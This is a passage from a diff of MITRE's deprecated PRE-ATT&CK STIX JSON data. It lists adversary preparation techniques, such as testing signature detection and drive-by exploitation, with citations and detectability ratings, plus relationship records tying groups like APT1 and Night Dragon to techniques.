+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the testing and can ensure data does not leak with proper OPSEC on testing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has the ability to procure products and not have reporting return to vendors or can choose to use freely available services", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1136", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test physical access", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).\n\nAn adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1360", + "external_id": "T1360" + }, + { + "source_name": "OCIAC Pre Incident Indicators", + "description": "Orange County Intelligence Assessment Center. (n.d.). Pre-Incident Indicators. Retrieved March 28, 2017." 
+ }, + { + "source_name": "NewsAgencySpy", + "description": "The Canadian Press. (2012, August 22). Reporter says Chinese news agency asked him to spy. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender often install badging, cameras, security guards or other detection techniques for physical security and monitoring.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires a physical presence in the space being entered and increased risk of being detected/detained (e.g., recorded on video camera)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1137", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).\n\nAn adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don't publicly publish results or they can test on their own internal infrastructure. 
(Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1292", + "external_id": "T1292" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If using a common service like [https://www.virustotal.com VirusTotal], it is possible to detect. If the adversary uses a hostile, less well-known service, the defender would not be aware.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to automate upload/email of a wide range of data packages.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1069", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9ac5715-ee5c-4380-baf4-6f12e304ca93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection for file upload/email filters", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1361).\n\nAn adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). 
(Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1361", + "external_id": "T1361" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Use of sites like [https://www.virustotal.com VirusTotal] to test signature detection often occurs to test detection. Defender can also look for newly added uploads as a precursor to an adversary's launch of an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Current open source technologies and websites exist to facilitate adversary testing of malware against signatures.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1138", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b3253d9e-ba11-430f-b5a3-4db844ce5413", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unauthorized user introduces compromise delivery mechanism", + "description": "**This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.**\n\nIf an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. 
(Citation: Credit Card Skimmers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1387", + "url": "https://attack.mitre.org/techniques/T1387" + }, + { + "description": "Jeremy Kirk. (2008, December 16). Swedish Police Warn of Tampered Credit Card Terminals. Retrieved April 2, 2017.", + "source_name": "Credit Card Skimmers" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:28:39.840Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1164", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "This likely requires the adversary to have close or insider access to introduce the mechanism of compromise.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This varies depending on the amount of monitoring within the environment. Highly secure environments might have more innate monitoring and catch an adversary doing this more easily.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--58d0b955-ae3d-424a-a537-2804dab38793", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Unconditional client-side exploitation/Injected Website/Driveby", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit's landing page. 
The exploit kit landing page will probe the victim's operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1372", + "url": "https://attack.mitre.org/techniques/T1372" + }, + { + "description": "Torsten George. (2014, October 15). The Internet's Big Threat: Drive-by Attacks. Retrieved March 7, 2017.", + "source_name": "GeorgeDriveBy" + }, + { + "description": "Lee Bell. (2013, January 8). Drive-by exploits are the top web security threat, says ENISA. Retrieved March 7, 2017.", + "source_name": "BellDriveBy" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:29:19.081Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1149", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Placing an exploit on a public web site for driveby types of delivery is not impossible. However, gaining access to a web site with high enough traffic to meet specific objectives could be the challenge.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "With the use of malware detonation chambers (e.g., for web or email traffic), this improves detection. Encryption and other techniques reduces the efficacy of these defenses.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Untargeted client-side exploitation", + "description": "**This technique has been deprecated. 
Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1370", + "url": "https://attack.mitre.org/techniques/T1370" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:30:45.039Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1147", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not fool proof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. 
Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Upload, install, and configure software/tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).\n\nAn adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1362", + "external_id": "T1362" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + }, + { + "source_name": "RedOctober", + "description": "GReAT. (2013, January 17). \u201cRed October\u201d. Detailed Malware Description 4. Second Stage of Attack. Retrieved March 7, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1139", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--616238cb-990b-4c71-8f50-d8b10ed8ce6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Use multiple DNS infrastructures", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).\n\nA technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1327", + "external_id": "T1327" + }, + { + "source_name": "KrebsStLouisFed", + "description": "Brian Krebs. (2015, May 18). St. 
Louis Federal Reserve Suffers DNS Breach. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information. However, tracking multiple DNS infrastructures will likely require multiple tools/services or more advanced analytics.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires more planning, but feasible.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1104", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + }, + { + "id": "relationship--0adf353d-688b-46ce-88bb-62a008675fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used servers in China, the U.S., and the Netherlands in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "type": "relationship", + "modified": "2019-03-25T14:36:29.818Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used third party hosting services in the U.S. in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. 
Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-03-25T14:36:29.820Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + }, + { + "id": "relationship--ef32147c-d309-4867-aaba-998088290e32", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + }, + { + "id": "relationship--e4501560-7850-4467-8422-2cf336429e8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f", + "relationship_type": "related-to", + "target_ref": 
"attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05" + }, + { + "id": "relationship--db10491f-a854-4404-9271-600349484bc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but are used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "type": "relationship", + "modified": "2019-08-20T13:08:13.223Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. 
Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "type": "relationship", + "modified": "2019-03-22T14:20:45.685Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + }, + { + "id": "relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + }, + { + "id": "relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + }, + { + "id": 
"relationship--28bf7e8b-9948-40a8-945b-6b5f2c78ec53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + }, + { + "id": "relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe" + }, + { + "id": "relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + }, + { + "id": "relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05", + "relationship_type": 
"related-to", + "target_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f" + }, + { + "id": "relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "relationship_type": "related-to", + "target_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33" + }, + { + "id": "relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + }, + { + "id": "relationship--f43faad4-a016-4da0-8de6-53103d429268", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has used zhCat to encrypt traffic or use inline obfuscation to make detection more difficult. zhCat makes message traffic look benign.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. 
Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "type": "relationship", + "modified": "2019-03-22T20:00:23.837Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used privately developed and customized remote access tools.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. 
Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92", + "type": "relationship", + "modified": "2019-03-25T14:36:29.918Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "relationship_type": "related-to", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6" + }, + { + "id": "relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + }, + { + "id": "relationship--ab313887-ff00-4aa9-8edb-ab107c517c19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + 